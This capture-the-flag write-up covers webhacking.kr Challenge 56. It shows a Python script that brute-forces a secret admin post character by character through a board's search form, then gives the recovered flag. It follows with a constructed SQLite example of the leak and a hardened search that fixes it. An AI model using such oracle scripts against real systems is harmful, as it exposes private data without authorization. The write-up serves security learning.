<html>
<head>
<title>Challenge 56</title>
</head>
<body>
<center>
<h2>B O A R D</h2>
<br><br>
<table border=1>
<tr><td>no</td><td>id</td><td>subject</td><td>secret</td></tr>
<tr><td>1</td><td>admin</td><td><a href=?read=admin>readme</a></td><td>1</td></tr>
<tr><td>2</td><td>guest</td><td><a href=?read=guest>hi~</a></td><td>0</td></tr>
</table>
<form method=post>search : <input name=search size=50 maxlength=50><input type=submit></form></body>
</html>
Based on the page source, the Python code can be written as follows.
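import requests
import string

URL = 'https://webhacking.kr/challenge/web-33/'
# The admin row is listed in the response only when the search string matches
TRUE_PHRASE = '<td>admin</td>'


def query(payload):
    # Submit the search form and report whether the admin row came back
    data = {'search': payload}
    r = requests.post(URL, data=data)
    content = r.text
    return TRUE_PHRASE in content


# FLAG{himiko_toga_is_cute_dont_you_think_so?}
def find_flag():
    flag = 'FLAG{'
    # Extend the known prefix one character at a time until the closing brace matches
    while query(flag + '}') is False:
        for character in string.printable:
            if character == '%':
                continue
            elif query('{}{}'.format(flag, character)) is True:
                flag += character
                break
    flag += '}'
    print('flag: {}'.format(flag))


find_flag()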
Running it shows that the flag is FLAG{himiko_toga_is_cute_dont_you_think_so?}.
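The script works because the search response differs depending on whether the search string occurs in a post, and that appears to include the post marked secret. The following added example (not from the original page or the challenge's own code) reproduces that leak on constructed data and shows a search that closes it; the SQLite backend, the LIKE query, the table and column names and the post bodies are all assumptions.

```python
import sqlite3

# Constructed sample data modelled on the board table in the page source.
# Table name, column names and post bodies are assumptions for illustration.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE board "
               "(no INTEGER, id TEXT, subject TEXT, body TEXT, secret INTEGER)")
    db.executemany(
        "INSERT INTO board VALUES (?, ?, ?, ?, ?)",
        [(1, "admin", "readme", "FLAG{constructed_sample}", 1),
         (2, "guest", "hi~", "hello~", 0)],
    )
    return db

def search_leaky(db, term):
    """Assumed vulnerable behaviour: secret bodies are searched and the row's
    id is listed, so every hit or miss confirms a guess about hidden text."""
    rows = db.execute(
        "SELECT id FROM board WHERE body LIKE '%' || ? || '%'", (term,)
    )
    return [r[0] for r in rows]

def escape_like(term, esc="\\"):
    """Escape LIKE metacharacters so % and _ match only themselves."""
    for ch in (esc, "%", "_"):
        term = term.replace(ch, esc + ch)
    return term

def search_hardened(db, term, viewer=None):
    """Search only rows the viewer may read: public posts plus their own."""
    rows = db.execute(
        "SELECT id FROM board "
        "WHERE body LIKE '%' || ? || '%' ESCAPE '\\' "
        "AND (secret = 0 OR id = ?)",
        (escape_like(term), viewer),
    )
    return [r[0] for r in rows]

if __name__ == "__main__":
    db = make_db()
    for term in ("FLAG{c", "FLAG{x", "_"):
        print(repr(term), search_leaky(db, term), search_hardened(db, term))
```

The authorization filter is what removes the oracle; the wildcard escaping only stops `%` and `_` from widening a match beyond what the user typed.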